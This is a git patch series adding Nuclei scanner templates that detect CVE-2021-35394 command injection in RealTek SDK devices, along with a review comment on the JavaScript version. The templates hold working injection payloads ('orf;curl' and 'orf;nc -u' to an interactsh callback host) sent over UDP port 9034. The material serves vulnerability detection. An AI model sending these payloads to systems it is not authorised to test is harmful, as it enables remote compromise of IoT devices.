From 7e5236bb216008bb5e8da8e80d61efd8abe53d14 Mon Sep 17 00:00:00 2001
From: Alexander King
Date: Tue, 10 Oct 2023 08:37:09 -0500
Subject: [PATCH 1/3] Create template for CVE-2021-35394
---
 network/cves/2021/CVE-2021-35394.yaml | 36 +++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 network/cves/2021/CVE-2021-35394.yaml
diff --git a/network/cves/2021/CVE-2021-35394.yaml b/network/cves/2021/CVE-2021-35394.yaml
new file mode 100644
index 00000000000..955070e5752
--- /dev/null
+++ b/network/cves/2021/CVE-2021-35394.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-35394
+
+info:
+ name: RealTek Jungle SDK - Arbitrary Command Injection
+ author: king-alexander
+ severity: critical
+ description: There is a command injection vulnerability via the UDPServer protocol
+ impact: |
+ Successful exploitation of this vulnerabilty could lead to remote code execution and compromise of the affected system.
+ remediation: |
+ Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
+ - https://onekey.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
+ - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
+ tags: cve,cve2021,realtek,rce,kev
+
+udp:
+ inputs:
+ # We bypass the "orf" command, which was supposed to act as a secret token
+ - data: "orf;curl http://{{interactsh-url}}"
+ host:
+ - "{{hostname}}"
+ port: 9034
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: interactsh_request
+ words:
+ - "User-Agent: curl"
From 5bbd9791f103693eb4ecf2c7faf41afb2dd89823 Mon Sep 17 00:00:00 2001
From: Alexander King
Date: Tue, 2 Apr 2024 11:31:18 -0500
Subject: [PATCH 2/3] Create CVE-2021-35394 template
---
 javascript/cves/2021/CVE-2021-35394.yaml | 33 ++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 javascript/cves/2021/CVE-2021-35394.yaml
diff --git a/javascript/cves/2021/CVE-2021-35394.yaml b/javascript/cves/2021/CVE-2021-35394.yaml
new file mode 100644
index 00000000000..01fc857f2f2
--- /dev/null
+++ b/javascript/cves/2021/CVE-2021-35394.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-35394
+
+info:
+ name: RealTek AP Router SDK - Arbitrary Command Injection
+ author: king-alexander
+ severity: critical
+ remediation: Apply the latest security patches or updates provided by RealTek.
+ description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
+ - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
+ tags: cve,cve2021,realtek,rce,kev
+
+javascript:
+ - code: |
+ const net = require('nuclei/net');
+ const conn = net.Open('udp', `${Host}:${Port}`);
+ conn.Send('orf;nc -u {{interactsh-url}}');
+ args:
+ Host: "{{Host}}:9034"
+ Port: 9034
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: dsl
+ dsl:
+ - success == true
+ condition: and
From bf917a270582e1477f977acc3e0ed43782bec6c4 Mon Sep 17 00:00:00 2001
From: Alexander King
Date: Tue, 2 Apr 2024 12:49:40 -0500
Subject: [PATCH 3/3] Remote template from the network directory
---
 network/cves/2021/CVE-2021-35394.yaml | 36 ---------------------------
 1 file changed, 36 deletions(-)
 delete mode 100644 network/cves/2021/CVE-2021-35394.yaml
diff --git a/network/cves/2021/CVE-2021-35394.yaml b/network/cves/2021/CVE-2021-35394.yaml
deleted file mode 100644
index 955070e5752..00000000000
--- a/network/cves/2021/CVE-2021-35394.yaml
+++ /dev/null
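Review bot: The `args` block sets `Host: "{{Host}}:9034"` while the code builds the address as `${Host}:${Port}` with `Port: 9034`, so the port is supplied twice and the string handed to `net.Open` presumably ends up as `host:9034:9034`; a failed open would surface as a false negative rather than an error, so define the port once, e.g. `Host: "{{Host}}"` and keep `Port: 9034`. The description line also has a typo, `arbitray` → `arbitrary`. The rewrite drops the `# We bypass the "orf" command, which was supposed to act as a secret token` comment and the onekey advisory reference that the network version in patch 1/3 carried; keeping both documents why the probe is shaped the way it is and gives responders a primary source for remediation.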
@@ -1,36 +0,0 @@
-id: CVE-2021-35394
-
-info:
- name: RealTek Jungle SDK - Arbitrary Command Injection
- author: king-alexander
- severity: critical
- description: There is a command injection vulnerability via the UDPServer protocol
- impact: |
- Successful exploitation of this vulnerabilty could lead to remote code execution and compromise of the affected system.
- remediation: |
- Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
- - https://onekey.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
- - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
- tags: cve,cve2021,realtek,rce,kev
-
-udp:
- inputs:
- # We bypass the "orf" command, which was supposed to act as a secret token
- - data: "orf;curl http://{{interactsh-url}}"
- host:
- - "{{hostname}}"
- port: 9034
-
- matchers-condition: and
- matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "http"
-
- - type: word
- part: interactsh_request
- words:
- - "User-Agent: curl"